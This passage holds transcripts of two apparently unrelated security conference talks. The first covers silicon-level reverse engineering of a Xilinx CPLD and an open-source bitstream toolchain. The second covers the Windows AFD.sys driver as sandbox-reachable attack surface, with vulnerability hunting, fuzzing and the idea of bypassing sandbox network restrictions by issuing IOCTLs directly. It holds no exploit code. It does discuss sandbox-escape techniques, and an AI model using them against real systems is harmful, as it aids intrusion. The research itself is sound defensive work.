those eight blocks, each one contains two S-rem cells. So it seems to make sense that we've got eight blocks. We know that we have eight bits controlling the left output. We have eight bits controlling the right output. So we probably have one bit per block controlling what goes left and one bit controlling what goes right. Then there's six identical blocks and there's six groups of wiring up in Metal 4. So there's probably some sort of correspondence going on here. Again, we don't know what it is, but we know there's some relationship. So now let's take a look up at Metal 3. So we can see there's power and ground routing here. We'll ignore all of that for now. But there are sets of one, two, three, four, five, six vias per row. What's more interesting is there are always six vias per row, but they're not all in the same place. So there is, if we actually trace it out for all of the rows, each one of those vias is under each of the Metal 4 groups. There is exactly one via in each row column intersection, but not at the same place. So now I finally realized what is going on. The routing matrix is not actually a full crossbar. It is a sparse crossbar in which of the 40 rows, each row can only pick six of the 65 inputs. But there's a different subset for each one. And the end result is that using all of these subsets, you can select any unique subset of 40 of the 65. But you don't actually need a 40 by 65 crossbar. So now let's take a look at how the actual implementation works. We have a pretty good hunch as to how this is structured at a high level. We don't actually know what the implementation is. So I do apologize for some of the misalignment. This was a quick tracing. And so not all of the vias and metal layers line up exactly. This is not meant to be something you can clone the chip from. It's meant to be something I can figure out how it works from. So you can see there's a big pass transistor here. We've got the signal coming in from the upper layer here and here. And then we've got an output of the mux here. There's an SREM cell that goes through a two input NOR gate and then drives that. So if we put this all together, what we see is that each row is indeed an 8 to 1 tri-state box mux. So there's one pass transistor that selects each of the six possible outputs for a row. Then there's a single discrete NMOS and a single discrete PMOS that lets me drive constant 1 or constant 0 as well. It turns out that the driver for constant 1 is active high. All the rest are active low. So this means that a blank bit stream of FF won't cause bus fights. It'll put all the outputs in a well-defined state. So this makes sense. And all the other signals are active low. There's also one additional signal I've called O-Gate. I have no idea exactly where it comes from, but I'm pretty sure that it's used during the boot process to basically pause the device, don't drive any of the outputs. It'll consume less power when the chip is idle. And it also prevents bus fights between drivers that aren't fully configured. If we've got half the device flashed and half not flashed during the boot process, we don't want to be driving signals onto nets that some other thing might still be driving with the old firmware. So as long as the signal is high, it gates all the outputs. And the rows are, again, not identical. But it turns out we can actually do the routing using MaxFlow. We just create a source node for each of the nets we want to route. We create a directed graph with paths for each of the legal connections to each row. Then we create a sync node with however many nets that we want to draw out. And we can just use MaxFlow to route everything. So as it turns out, the structure is pretty much that. I do have a full schematic. This is not it. I've kind of truncated the bottom to make it fit on the slides. But we've got a single configuration bit. We've got the NOR, which I've actually drawn as a negative logic AND because that's really how it's functioning. Output of that goes to a single PMOS pulling high. We've got an NMOS pulling low. Then we've got MUX in top A0, MUX in top 90, and so on. Those are the actual hex codes in the bit stream for selecting that particular input. So we make that row be set to A0 if we wanted to write to this element. And I do also have a table in the source for my tools that includes all the MUX settings for this device. So I now can fully control the global routing matrix. But there's one last bit. We know the ordering of the inputs. We know how to select one of the inputs and drive something. We don't know which input is actually hooked up to which signal on this bus. So time to get dirty again. There were a couple of options I considered, but it turned out that one of the simplest was to make a few educated guesses about how things were structured. So for example, all of the macrocells in function block one, they are flip flops, are probably in a contiguous order on the bus. We don't know where on the bus they are, but they're probably contiguous. All of the input pins for function block two are probably contiguous as well. So let's tinker around a little bit. Okay. The inputs to function block two are probably contiguous. So there's not really that many orderings for the global input pin and these four sets of inputs. Let's just try tinkering and see which one works. So I went up to campus, hopped on the focused ion beam, drilled a few holes in the insulator over some wires, and laid down some nice gigantic 20 micron square probe pads. And then I just started driving signals onto each net. Here's the code I'm using. It's just a counter going from a 2 megahertz input dividing down to, I believe, a 2 hertz LED. And then I have one signal before that. So 4 hertz is on a specific flip flop that I've constrained the two. I was like, okay, here, function block two, macrocell five. So let's see. If we probe function block two, macrocell five, or if we put a signal on function block two, macrocell five, it's supposed to be 4 hertz. And we've got a probe pad on this signal. Is it a 4 hertz square wave? Oh yeah, it is. All right. I guess it's right. So it didn't take too long to figure out the actual bit ordering. So here's the basic summary of the actual layout. We've got gates on metal one and poly. Metal two is vertical routing, SRM bit lines, O-gate. Then horizontal routing on M3. Then M4 is the input bus. It turns out the actual ordering is the GPIOs for function block one, the global input, GPIOs for function block two, then the flip flops left to right. So now we know pretty much enough to configure the PLA. Unfortunately, there's more to it. Because it turns out all of the product terms, or nearly all of them, are dual purpose. They can be used as general purpose logic. You can feed them into the OR array. But each of the 16 macrocells also has three product terms that have separate dedicated connections to it. These are used for set, reset, clock, enable, and so on. I'll cover some of this in the next slide. Four more have special connections to the entire function block. And the last four, as far as they can tell from reading the datasheet, they have no special purpose. The datasheet does tell us these things exist. They tell us roughly what they do. They don't tell us which of these 56 product terms does what. So I will just briefly cover what these terms are. So we've got per function block, we have a local clock that we can use. So we don't want to waste global clock resources for the whole chip. But we also don't want to have a per flip flop clock because that will both increase skew and use a lot of product terms that we really don't need. Then we have dedicated set and reset and dedicated output enables. Then per macrocell, we've got product terms A, B, and C, very inventive naming. So product term A is one of several legal sources for set, reset. There's also a, the control term set and reset can be used instead if you want. There's product term B, which is one of several possible sources for the IO buffer output enable. And then product term C, which can be used for a couple of things. If you've got a clock enable, it's used as a clock enable. If you want a per macrocell clock, for just one flip flop that you're clocking off one weird clock that nothing else is clocked by, you can use that. And it also drives an XOR gate. So it turns out that this isn't quite a conventional CPLD structure. The output of the PLA is XOR with product term C or its complement or a constant one or constant zero. This is a Xilinx proprietary optimization. That is, again, documented in the data sheet, but they don't tell you how to configure in the bit stream. The intention here is to allow you to do efficient adders. You've got XOR. You don't have to do not X or Y, not X and Y or not Y and X. So you can just use the XOR gate. So the question is, okay, we've got 56 product terms. Which one is PTC? No idea. Well, it turns out we can configure the PLA as much as you want. We already know how to configure that. We've reversed all the bets for that. We can configure the global routing as much as you want. And it's fairly easy to generate a bit stream that is known to use product term C from the tools. All we have to do is either synthesize something with an XOR in it or it turns out there's actually an optimization of the tools. If you are not using the OR array, just say we just have Y equals A and B. It turns out that if we set the OR array to output a constant zero and then we XOR that with product term C, we no longer have the OR array in our critical path. So you can sheave about 500 picoseconds off the propagation delay by doing this. The compiler trying to optimize speed does this by default if you're not using the OR array. So therefore, just by creating an equation like Y equals X in your source code, you can trivially produce a bit stream that uses product term C. So all we have to do is say, okay, let's make something that uses product term C. We'll spam these black box macro cell bits into all of the outputs and just start feeding inputs into various product terms until we find one that hits. Well, it turns out it is zero based term 3N plus 10. Unfortunately, I have things called customers that kept me from working on this project as much as I would like. So I never actually figured out what product terms A and B are. I'm pretty sure that they're either just above or just below product term C. I don't know which. The control terms, if you remember, product term C is 3N plus 10. So below number 10, none of these terms are actually being used for anything in PTABC. So the control terms are probably among the first couple of terms. But again, I have not actually had time to figure out which is which. One more wrinkle is that there are some global configuration bits. So if you remember, we've got the structure of the die on the left side and the right side. I've got the function blocks and the top. I've got global routing and the bottom. I've got global routing. So that pretty much makes a big donut shape. In the middle of that, there's wasted space. But no, it's not actually wasted. There's 22 single configuration bits, the middle of the die. We know three of them control the VT for the IO banks. The device has two IO banks, but the original XC2C32 only had one IO bank. So they did a clever hack. They are now bitstream compatible with the 2C32. They added four more configuration bits. So the way they did this is they have one global bit. If this bit is set, then it will use the old school XC2C32 configuration setting for this. The newer ones are two additional per bank bits. So it actually just does a bitwise add between the global bit and the per bank bit. If you erase the device and you don't program these last couple of fuses, then you will get the default XC2C32 behavior in which you've got one IO standard for everything. If you're compiling for the 32A, now you set that other bit as a constant one. Leave the other one set the way you want. And now you get the ability to set VT for each bank independently. So it's actually pretty clever. Then there are other miscellaneous things that are there. The comments in the bitstream were a little bit helpful for this. So I know there's three bits that configure global clocking, two bits that configure global set reset, eight that configure global output enable. I do not actually know what the coding for these bits are at this point. So there's still some work in progress going on. Now I will get to the actual tool chain that I'm producing. I've called it libcrowbar after the flying crowbar project on SiliconPron. The goal is to, in general, produce open source tools for programmable logic. It does need a lot of refactoring and tweaking. It does not do nearly everything that I want. It only supports the 2C32A right now. We can scale to other devices. The 64 cell device is pretty much just a scale up of the 32. I've decapped it. I've looked at the top layer. It's just a 2x2 grid of function blocks instead of 1x2. The ROM for the routing fabric will have to be decoded separately, but that shouldn't take too long. The ordering of the bits will have to be decoded, but again, that shouldn't take too long. I can probably just brute force it. And the macro cell configuration and everything else is pretty much exactly the same. The larger device is the 128, 256, 384, and 512. It adds some additional features to macro cell. So in addition to figuring out the actual routing stuff, I will actually have to do some additional reversing of the macro cell logic. So that remains a work in progress, but that is a goal. The library is BSD licensed. You can grab the code from there. I do not recommend attempting to use it in its current state. It's more of something to look at and understand how the chip works. And maybe in a couple of months, it will have something that's actually stable enough you can actually use. But I do have a quick usage example here. So we have a bunch of IO pins. We select P8, P6, P38, P37, whatever. Then we get the IOBs for each of these. We can now select the IO standards, some output enables. We're not going to use termination. We're not going to use Schmidt trigger. These are all bits in the macro cell that I was able to figure out. There are still quite a few related to the clocking that remain unknown at this point. And then there's quite a bit more going on below this. I can pull out full source if anybody is interested in looking at it. But the end result is that I can go from an in-memory technology map net list created like this as C++ objects. I can then place and route this, produce a valid bit stream, flash the device and have it work. I can also go the other way around. I can go from a program device. I can read out the bit stream. I can turn it into an ASCII art schematic. And I can turn it into synthesizable Veralog as long as you're not using the features I haven't yet reversed the functionality of. The remaining thing in the forward tool chain is I would like to integrate with YOSIS for synthesis, take the output of YOSIS, do technology mapping on that and then feed it into libcrowbar. At that point I will have a full Veralog to bit stream tool chain. I'm not quite there yet, but it's coming close. The other tool I've made, if any of you have used plan ahead from Xilinx, I called mine very inventively FC plan for the flying crowbar floor planner. So it is a floor planner and physical layout viewer. I currently only have rendering for the and array and the global routing. The or array, I do have the functionality reversed. I have not written the code to actually draw it, but I can actually open up a bit stream and look at the individual settings in the and array. The macro cells also, I've reversed some of the bits, not all of them, but I have not yet written code to actually render the appearance of them as check boxes for, okay, instrument trigger is enabled, the terminator is enabled, the slew is fast or slow and so on. So those all remain in the wish list at this point. The configuration bits are known. You can access them from libcrowbar. You cannot do so in the GUI. So here's one more view of FC plan. This is showing as you zoom out, the product terms shrink down to smaller columns. You can see the full global routing matrix here. This is the actual via pattern. It doesn't show up as well in the projector again as I would have liked, but you can see the actual mux bits in there. When you zoom in in the tool, you can actually see the signals coming in from the global routing going out through these vias and into the and an arrays. Before we get the demo, I do want to thank John McMaster from SiliconPron. Hi, John. He did most of the large scale optical imagery for this. He also did the dash etching, which was very helpful. Then Ray Dove and Brian Colwell at RPI run the material science lab in the clean room respectively. They were quite helpful when it came time to getting access to the electron microscope in the clean room and so on. As far as I know, I am the only computer science student there, whoever ran the electron microscopes. But I did actually get access to the clean room, the SEM, the FIB. I was trained on all of them and they were quite helpful. Then the SiliconPron team in general was quite handy when it came to just getting feedback and sanity checking and does this look okay to you? I can't quite make out what this connects to. Do you have any ideas? Or just sharing process suggestions, okay? What are some ways I can get this edge to be a little more even? Something like that. Now, I'm to attempt the demo gods. I have my JTAG daemonic connected already. This is my dev board. It has a small FTI 232 on there that I'm using for JTAG. What I'm going to do is I'm going to create a bit stream using lib crowbar that will act as a not gate and a buffer. Then I'm going to bit bang inputs going into there with the FTI chip. We should see one LED and then the other alternative lighting up. I don't know if you guys can see. Right up here, these LEDs are blinking back and forth. If we scroll through the output here of the tool, you can see we start out initializing. We connect to the JTAG chain. We see okay, there is a device. One odd note, the cool runners are the only devices I've ever actually looked at in which the JTAG device ID actually includes the package as well as the device. What this means is that they've actually got a fuse somewhere in the die that says, oh, this is a TQFP. This is a BGA. I've never seen that on any other device. Any other FPGA or microcontroller, anything I've used, the device ID was the same between different packages. Anyway, so we confirm, okay, yes, the STDI chip has GPIOs on it. We generate our net list. We figure out the actual function block and macrocell locations of the IO buffers we're using. Then it runs the fitter through IO banks, macrocells, function blocks, does global routing, repeats for the other function block, does global routing for that, confirms okay, fitting is complete, took 620 microseconds. If any of you have used the Xilinx Compilers, they're not that fast. Then we finish generating the bit stream. That's kind of slow. Right now, it took a couple of milliseconds. I'm pretty sure I can optimize this. Monk, this is a debug build of profiling turned on. So it'll be a lot faster if I actually compile the optimizations. Then we actually configure the device. We verify, okay, yes, we are talking to the right device. We've got the right number of fuses. We erase it. We make sure it's blank. Then we just bit bang the out as 0 and 1. It confirms that the loop back going back to the FDI chip does have a value that we expect from one of MsX and one of MsX prime. That looks good. Now, let's see what happens if we actually want to reverse this. Let me see if I can up the font size. Can people read this? I'm guessing no. Is that better? All right. So this is what happens when we actually try dumping the bit stream. This is not the same bit stream. This is a different one. I just picked that random I had sitting around. So we have a nice ask your schematic showing all the inputs coming in from the PLA or coming in from the global routing. Each of these represents one connection. That's one configuration, but it's actually connected to something. We have the X and the X bar outputs. Nice big grid. Then 56 product terms to the or array. We've got outputs going to the agris array. This table looks a lot nicer at 1080p when your font isn't quite so big, but I do actually have details on, okay, this output is floating. This one is configured as an input, this is an input, this is an input. There's an output in here somewhere, probably on the other one. Whatever, I must have scrolled past it. So now on the output, we have the IO standard. It turns out even though there's about a dozen IO standards you can pick from its emphasis time, in the bit stream there's only two. There is the high voltage and the low voltage. So there's 1.8 and 1.5 and there's high voltage. So my guess is what this does internally. I have not fully reverse engineered all of the IO driver's arbitrary, but what I'm pretty sure it does is it selects a single threshold or another and then thicker a thinner gate oxide in the output. There's about four or five different sets of drivers in the output for fast and slow, different voltages and so on. I haven't actually done TEM cross sections and measured VTVs transistors or anything like that. It wasn't necessary for this. And then we've got a bunch of stuff here for the global clock muxes, global reset muxes and everything. And all this remains unknown. I know roughly, I know which bits these are. I don't know what the functionality of those bits is. And then, let's get the fun part. Let me actually switch to the adder test.jed file. This one has a simpler, this is a 4-bit adder, which will make a lot more sense than the 32-bit adder I was showing the other one. So here's our RTL. It is pretty much the assembly language of AeroLog. This is a direct analog of the actual PLI structure. I have not attempted to figure out any higher level structure. This is actually equivalent. I have not tested synthesizing it. I actually just found a bug last night here on lock equals. That should be quoted. So right now the output as formatted won't synthesize, but it would be fairly trivial to fix that and make it actually synthesize and work. And then I've got function block 2. There's not really anything in there. So now before we get to the questions, I'm just going to jump up to FC plan and show you guys what the actual structure looks like in the floor planner. I guess I found a bug. The scroll on this thing is really sensitive. All right. Can I go just one click in? All right. That's probably good enough. So you can see what I've got. Initially we're bypassing all the inputs. So we're not using the first couple of rows coming off the global routing. Then down here I've got one signal coming in. It's hooked up over here to X. It's hooked over here to X crime. Goes into the AND gate. Then we go down there and so on. So we do actually have a full physical layout viewer at this point. So now I'm just going to jump back to the slides for just one or two more before we get back to... So what remains as far as future work? We still have to figure out the last of the special product terms. There still are about six or eight bits in each macrosail that we have not yet figured out the functionality of. There's still some more in the global devices. The global bits. As I did mention, there is a little bit more I need to do to support larger devices. As far as the tool chain, I want to do more work in the decompiler. My long-term goal with this work is to integrate with some other bitstream reversing projects and so on and create the IDA for hardware. I would like to be able to go from bitstreams for CoolRunner, bitstreams for Part 6, bitstreams for Stratix 4 and everything, and go from that up to a device-dependent technology map net list. Abstract that up to a device-independent net list. Something more along the lines of LLVM IR for hardware and then do higher-level analysis on that to figure out, okay, this combination of XOR gates and MUX is looks like a 32-bit adder. This combination of stuff looks like a 10-to-1 MUX. This combination of stuff looks like a Cortex M3. I would like to eventually be able to have something along the lines of flirt here. I do know that subgraph isomorphism is NP-complete. I don't know if I can make a randomized or approximated algorithm that's fast enough that remains a topic for future work, but it is on the wish list whether it is physically possible or not. So, at this point I'll take questions. Seeing none, I guess we're done. Thank you. Thank you.
|
Programmable logic devices have historically been locked up behind proprietary vendor toolchains and undocumented firmware formats, preventing the creation of a third-party compiler or decompiler. While the vendor typically prohibits reverse engineering of their software in the license agreement, no such ban applies to the silicon. Given the choice between REing gigabytes of spaghetti code and looking at clean, regular die layout, the choice is clear. This talk describes my reverse engineering of the Xilinx XC2C32A, a 180nm 32-macrocell CPLD, at the silicon level and my progress toward a fully open-source toolchain (compiler, decompiler, and floorplanner) for the device. A live demonstration of firmware generated by my tools running on actual hardware is included.
|
10.5446/32819 (DOI)
|
Hello. Yes, we're working great. It's the first conference I've ever been to where everything just kind of magically worked. Second I stepped on stage. So thank you very much to the audio and visual crew here for making that an incredibly easy process. My name is Steven Viddetto. I work for Google on the Project Zero team. Relevant contact information is here if you have questions or you want to get a hold of me or complain to me. You find my Twitter handle and email address. I also play a lot of Capture the Flag, so I play on the SAMRA ICTF team. And if you want to play CTF, I would encourage you to do so. It's a great way to take reverse engineering skills and apply it directly to vulnerability analysis, which is really kind of how this research started. I was hunting for bugs in AFD.SIS. And while I didn't come away with any bugs, I came away with a pretty good understanding of the driver and felt that worth documenting. So in outline, we're going to talk about why I was even looking at AFD.SIS to begin with. And it's not because it starts with A. I didn't just list all the models and say, well, we'll go with that one. We'll give you a kind of Winsock overview. AFD is a part of this overall system architecture in Windows called Winsock. We'll tell you some of the interesting findings I had in the driver itself. Tell you how you can talk to it, where it initializes from, and how you can use it to your own benefit. And I'll tell you about the vulnerability analysis I performed on it and some of the fuzzy work that I did. And then we'll kind of wrap up with what I'd like to do with this in the future. And hopefully, we can encourage other people to get involved with this kind of research as well. So what is AFD.SIS? It's a default kernel module. The module is in System32 drivers. You can go and look at it and get the file properties on it. And you'll see it says the ancillary function driver, which there's a story behind this name, actually, that it used to go by a different name. Does anyone know what it is? Yes, sir. Another fucking driver. So you can imagine the guy just sitting down programming drivers all day long. And at the end, he has a 30th driver to program. He's like, another fucking driver. And he named it that in the initial stick, but he has to change the name before release. So ancillary function driver, which is the ring zero entry point for socket. So when you do a socket call, you bounce around in this user mode architecture. It doesn't actually do anything for you until you hit kernel. And we'll tell you more about how that works. So not everything in Windows uses AFD for network communications. And Microsoft is sort of notorious for this, of building the same systems to do different things. So you could talk to the network by at least four different ways. So you've got AFD, you've got WinHTTP, which will go through HTTP.Sys, you've got WinInit, you've got WebDef communications, and you've got MRX, SMB for SMB clients. So basically, networking file systems and special optimizations for internet heavy communications. But this is the one that was really interesting to me, you know, with the BSD socket APIs. And why we're interested in it, not because it starts with A, but because it is very accessible from sandboxes. So if you look at, you know, the Chrome sandbox, the renderer process, for example, has accessibility to read devices, AFD endpoint. You can open it, you can send diatoms to it as even a guest user on your system. Same with Adobe Reader and same with IEPM. In fact, every, every sandbox that Project Zero looked at, and really James Forschal on Project Zero looked at, had this device accessible. So despite the fact that you can't initialize WinSoC in the, like, Chrome sandbox, you can't call WSA startup, you can open the device AFD and send Ioctals to it to make your network communications without the benefit of the user mode WinSoC framework. So this is immediately interesting, as you get this functionality by sort of bringing your own WinSoC along in shell code or whatever you have. And for bugs, there's a history of bugs. There's been about one good one a year. One of these was an information leak, but the one last year in 2014 was a full-on privilege escalation that was really, really well documented and actually ended up being used as part of a chain of bugs to take a $100,000 prize away from Ponto and competition. So Google was naturally interested in this as well and continued to do some of this research. Okay, so as I said, I work for Project Zero and sort of the one-line mission statement of this team is to make zero days hard or not impossible but more difficult so you can't spend a week fuzzing something and walk away with a zero day, it'll get you on 100,000 computers, right? So we need to make that a more difficult process. And we have three approaches to do that. The first one is to make sandboxes more difficult. So sandboxes are, you know, a widely adopted technology already. You see them, you know, like Chrome, IE, Reader and Office apparently now too, right? So the idea behind them is to increase attacker cost. So you have to use an exploit to get into the sandbox and then an exploit to get out of the sandbox. So we feel that the process of getting in is easy and that's the second approach is we'll make that harder by fuzzing out low-hanging fruit and we'll do a lot of manual analysis on the sandbox to make getting out harder as well. So we've historically sort of seen three big ways of getting out of sandboxes. The first one is logic errors in a broker process where, you know, you have a sandbox and you can't write any files, you can't make any network communications, you can't do any registry reads except you actually do need to pull this configuration. So you talk via IPC to another process that has the permissions to do what you need and then you can get in just that one narrow path and sometimes there's a lot of these things that are exceptions to a sandbox and we'll find logic errors with those things. A sandbox is only as strong as the kernel that it's running on or the accessible part of the kernel that it's running on and you find things like 132k sys coming in at, you know, 3.1 megabytes with next year, I don't know how many hundreds of system calls you can hit off of that and these are both well-known things. The one that you don't see a whole lot of people talking about was accessible devices. So after you've been accessible, there's also like your USB hub is accessible through most sandboxes as well. So this is sort of a not often talked about attack surface for the Windows kernel and sandbox escapes in particular. And you actually can't even disable this thing until Windows 8. So you could go in with an administrator and change the permissions on the device but then no one can make socket calls on your computer which is not something you want to do. And Windows 8, you can use like an app container with a low box token and disable that specific file but that's not a simple process to do. It's not like say, restrict it for one particular usage or technology. It is something that is always there and has always been there. In fact, it actually dates back to Windows 95. So if you fire up a 95 box, you'll see AFD.Sys running and doing much of the same thing that it's doing today. So we have this kind of like perfect storm of complexity and accessibility. And when I say complexity, like you can take a real quick blush at it and you see that it's 500K. Most drivers, if you look at, you know, it's kind of average of sizes are less than 100K. It's not as atrocious as, you know, a 3.1 megabyte driver but it's still, you know, quite sizable. And it will handle 70 iOctyls, 71 iOctyls out of the box directly off of the endpoint. And it is designed to map between different protocols. So it's handling everything from TCP IP and IPv4, IPv6, TCP UDP, raw sockets to SAN requests. So there's quite a lot going on here that it's trying to account for all at once. This is a very dated diagram but it kind of gives you an impression of where Wensock lives and how it works and where AFD fits in that picture. So across the top here you'd have your applications. These will largely be, you know, Windows 32 64 bit applications. They'll talk to WS232 DLL directly now so you don't see this old, like, Wensock import directly from Wensock 1.1 back in, like, Windows 98, 2000 days. The application will call Socket. So if you started off your application, you did Socket, AFI Net Call. You'd have to initialize this first, obviously, this is WSA startup which will load all these DLLs into memory. But the Socket function first goes to WS232 where it immediately calls the WSA version of Socket. So you see this a lot in Microsoft code where you have a wrapper with one function called just calling off to another one with the exact same arguments, maybe a couple of them are null. And then from here, that pretty much gets out of there really quick too and goes off to MSWsock.DLL which is where a lot of the functionality is actually implemented. MSWsock then has an abstraction to say which protocol do you actually want to talk to? So in this case, we're saying we want to talk TCPIP or AFI Net. We could pass an AFIRDA and we would be speaking, you know, infrared as well. And there's a different helper DLL for each protocol that you could load. And, you know, this is all very well documented and understood and Windows and how to write these helper DLLs. So I won't spend a whole lot of time going on with it. But basically, we bounce to the helper DLL and then back out to MSWsock and that's where Ioctals start to happen to AFD.Sys. Down here in kernel mode. So it's the first stop in kernel mode. When you make a socket call, there's actually three Ioctals that happen. The first two poll information about the specific protocol, specific socket type you tried to open. And then they set the information into an AFD structure that is created when you first open AFD endpoint. So that will contain your unique data about this is for AFI Net, this is a Sock stream socket, and that will control how AFD reacts to the rest of the endpoint off of this initial setup. Oh, this is kind of funny too. So Microsoft is very, very good about being backwards compatible. And if you go and you look at some of these files on here, msafd.dll is literally an empty PE file. So it has one export shim to point to MSWsock. But otherwise, it is pretty well defunct but still exists as an artifact to provide compatibility. So in this way, AFD really acts as a translator between multiple protocols that can be specified in user mode and a lower level kernel abstraction. So AFD is not your network driver, it's not sending out your packets, but it is translating your calls to either TDI or WSK. And WSK is one sock kernel, so they sort of extended this user mode architecture down throughout kernel mode. And TDI, they're going to deprecate it, you know, you shouldn't use it anymore. And like things like layered service providers and AFDs and Windows filtering platform, it's still there. And when you're making a plain socket call, this is what it's going through. It's still going through TDI. So kernel mode calls, kernel mode clients that want to open a socket can use WSK to open a socket. And this is actually implemented also in AFD.sys. So AFD.sys becomes a Winsock kernel provider and you can see it registering for all of these inputs as well. Unfortunately, you cannot hit the WSK code from user mode. Otherwise, really interesting things would happen. And, you know, that would be a topic for vulnerability analysis all on its own. My interest was simply what was accessible from the sandbox. So I was looking at the root 70 or 71 Ioctals that you can hit. So you open up the driver in the first glance, you notice there's tons of debug prints. There's like 113 cross references to it and there's like a thousand functions in there. So 10% of the functions had debug prints in them. And normally you think about, well, I should remove debug prints on release builds or use the ETW event tracing for Windows, which also accounts for a significant amount of code in this driver. And you see the debug prints going up over time. So 23 to 113 between Windows 7 and Windows 8. I'm not really complaining about this. It makes reverse engineering this actually a lot easier because it will tell you, you know, at this offset, this registry needs to be print out and, you know, the value of whatever structure offset it was will be printed to you in plain text. So this was both useful for reverse engineering and for, you know, turning on the debug prints to come back to a kernel debugger so that you could watch what was happening. And, you know, the check bill does similar things. So the first thing it does, it creates this device and then it starts reading in configuration from the registry. My best guess as to why this happens is so that you can have an AFD that is tuned for a client machine that is, you know, the same code but tuned differently for a server machine for a phone. So it will receive all of these different configuration settings, normally things like buffer sizes were in there that was interesting. If you have raw security enabled, so if you've ever tried to open a raw socket after XB service pack 2, you're going to get access denied unless you have a registry bit flipped here and there's one for AFD and there's also another one for TCP IP. So this is a common configuration setting for drivers. And then you see, you actually see protocol specific things coming from this configuration as well. So default send windows, the TCP windowing, that you can actually adjust that in your registry. And it's very easy to find all of these configurations. You just run strings on the binary and you'll see all of them. And this fills out this AFD config info structure that's referenced all over the place. The buffer size is one for me as a vulnerability analyst caught my eye because if you start a driver and then it has a certain buffer size configuration and you can change that as it's running, well, one buffer size is not going to be the same buffer size between other runs or other calls to it. Unfortunately, well, fortunately for the security, the keys are appropriately security. You have to be admin. And if you're already admin from a sandbox, there's a lot easier ways you can do to escape a sandbox. Now, a few of these configurations are registered as volatile configurations so that they register a change event notification on the registry. So the driver will get a callback when this registry key changes and it will reconfigure itself. Things like buffer sizes are not in that and the disable raw security was not in that, which is why you have to reboot after setting this flag if you want to make a raw socket communications. So let's talk about inputs. This is really what matters when we're talking about what does it do with the data I want to give it. Drivers usually receive inputs off of I octals. This is where the majority of the case is here. You can see that everything is set to AFD dispatch and they have a few different dispatch controllers so AFD dispatch device controller is the one I focused on. There's a WSK dispatch for internal only, event tracing dispatch and then there's a fast IO patch which mostly maps back to other dispatch device controls and of course an unload which is mandatory for drivers. It also registers plug and play events. So when you plug in a new network card or a new infrared device, AFD is going to get a notification about that as well. And then likewise, it is aware of the TDI layer because that's who it is. It is a client to TDI as it is a server for user mode. It is aware of TDI address changes. So if we have a new device plugged in and it gets an address, AFD maintains a list of those addresses for use and other user mode socket calls. And then as things developed and Microsoft put RPC and the kernel, AFD was not immune from this as well. It has several imports from MSRPC. I haven't reversed those yet but RPC and the kernel really sounds like an interesting thing, doesn't it? So this is the big I-Octyl table. Again, it's easy to find. It's set at the bottom of GS driver entry and immediately after it are the numbers of the I-Octyls. So basically, the first thing on the list for the I-Octyl table matches to the first function and those are the symbols if you wanted to go and pull them. There's actually another level of inter-reference here. So if you look at this, you can probably see that, like, I don't know if that works. So like, these are all AFD dispatch immediate and they have different numbers associated with them but it's always going to the same function. So basically what's happening there are those are the I-Octyls that will always return an I-OF complete request immediate. So they don't say status pending. And this is where the fast path things map to as well. And so just an example, so there's another table here. So off of call dispatch, there's another table that's referenced inside dispatch immediate and these map one to one with nulls for the other I-Octyls that come in. Kind of interesting here as well is that you find that there's overlap between the functions off of the fast path as well. So like, several of the I-Octyls for dispatch immediate all point to get context or set context. And these are for setting different kinds of information on the socket and it defines that by I-Octyl number. Right, so static bug hunting. I mostly focused on Windows 7, x86. I wish I would have started with Windows 8. The driver disassembles quite a bit easier. The symbols seem to match up and give better hints at what's going on. And mostly it was classic bottom up analysis. I'm looking for mem move, mem copy. All of the dozen or so EX allocate pool routines that are there. All of those look good. So there's probably 200 cross references to these routines. You go look at one. You say, is there a way to make the buffer overflow with a long length or is the buffer appropriately sized? Is it aligned properly? These are fairly well documented techniques for finding bugs and kernel drivers and it's just a manual slog through it. The other technique I like to use on drivers is to cross reference security check cookie. So the compiler is kind enough to tell you that, oh, there's lots of stack operations here. There's lots of copying. There's a large stack buffer. I'm going to put a cookie there and I'm going to check it on the way out. Well, if I go through all of those functions, I'm guaranteed to find good opportunities for vulnerability analysis. Likewise, functions with large stack buffers that may not have a cookie on them for one or reason or another, or also a target for analysis. And then the one that I really love to have a solid automated story for, but I don't, is object reference counting bugs in this. There are several instances where references are increased and every code path that I did data flow analysis on and control flow analysis on showed that these were being used appropriately. So Microsoft did a really good job writing this driver. You could tell that it had been looked at manually. You could tell that it had been fuzzed by going through it. And this is kind of indicative of the bugs that they were getting out of it too. So the bug last year was a dangling pointer reference. So this was an object reference issue. So there's a couple of scripts I wrote that would automate checking for returns. Like when you call EXL to the K pool, can you verify that you got a pointer back? And there was one that really kind of, they caught me for a little bit, was tag priority, which actually doesn't return a bad value when it has a problem. It raises an exception, which is different from all of the other EXL to K pool routines. So I went through all of the reachable Ioctals. I did not go through WSK and I did not go through SAN because you do have to have a SAN device enabled to reach a lot of them. They paid very good attention to data alignment and proper size restrictions on any buffers you passed in. And the majority of the Ioctals were passed as method neither. So method neither you get a, basically the IO manager doesn't copy any of your data, you get pointers directly to user mode. And this is sort of the reason why you have a lot of bugs in WEN32K Sys is because many of those Ioctals are also method neither and you can get into time of check, time of use bugs very quickly. So I manually checked for these as well along with integer issues. The fuzzing bit, I banged my head against this in three or four weeks and I had a frustrating time with it because I wasn't finding bugs. So when you get frustrated or I'm just going to throw all the crap at the thing and see what happens. So I wrote up a quick fuzzer and I had a pretty good understanding of what it was actually doing with the Ioctals with the limits where you couldn't pass in more than 256 bytes for an AFD bind request. So I built these kind of, this knowledge into the fuzzer when I went to fuzze the object. So it had, it wasn't wasting a whole lot of time fuzzing things that were kicked out, you know, at first glance at the function. And this is my preference. I usually like to do static analysis over fuzzing because you get a better understanding. And if you're going to go the route of fuzzing, I would encourage you to do static analysis first because I think you're going to write a better fuzzer in the end having some knowledge of what it's doing. So I had two weeks of fuzz time off it. I did not scale it. I had a single core running. I basically had two VMs, one running my fuzzer, one doing a kernel debugger back to it. So when, when, if an exception happened, I would catch it and be able to analyze real time. I had a, it was kind of a simple fuzzer with maybe one little novel technique. It would, it would hit all of the Ioctals and it would, it would then have the buffers that were passed into these Ioctals mutated by a separate user mode thread so that we could, we could attempt to find these time of check, time of use bugs. Now there's a race condition there that you're not likely to end unless you align things on page boundaries. But you know, if, if you were going to scale this, I think that you're likely to hit it at least once or twice. So the, the fuzzer did not turn up anything, which was not terribly surprising given the quality of the code, but we did have at least a poke at it. So for a little bit of future work, it's really interesting to say that you can have this, this sandbox and you can't make socket calls, but it is, it is technically possible to write a native AFD library. And I'd say native, like you could, you could link in AFD underscore socket. And even though you don't have the whole WinSock framework supporting you, so long as you can talk to this driver in the, in the right way, you'll be able to get, you know, socket communications out of a sandbox 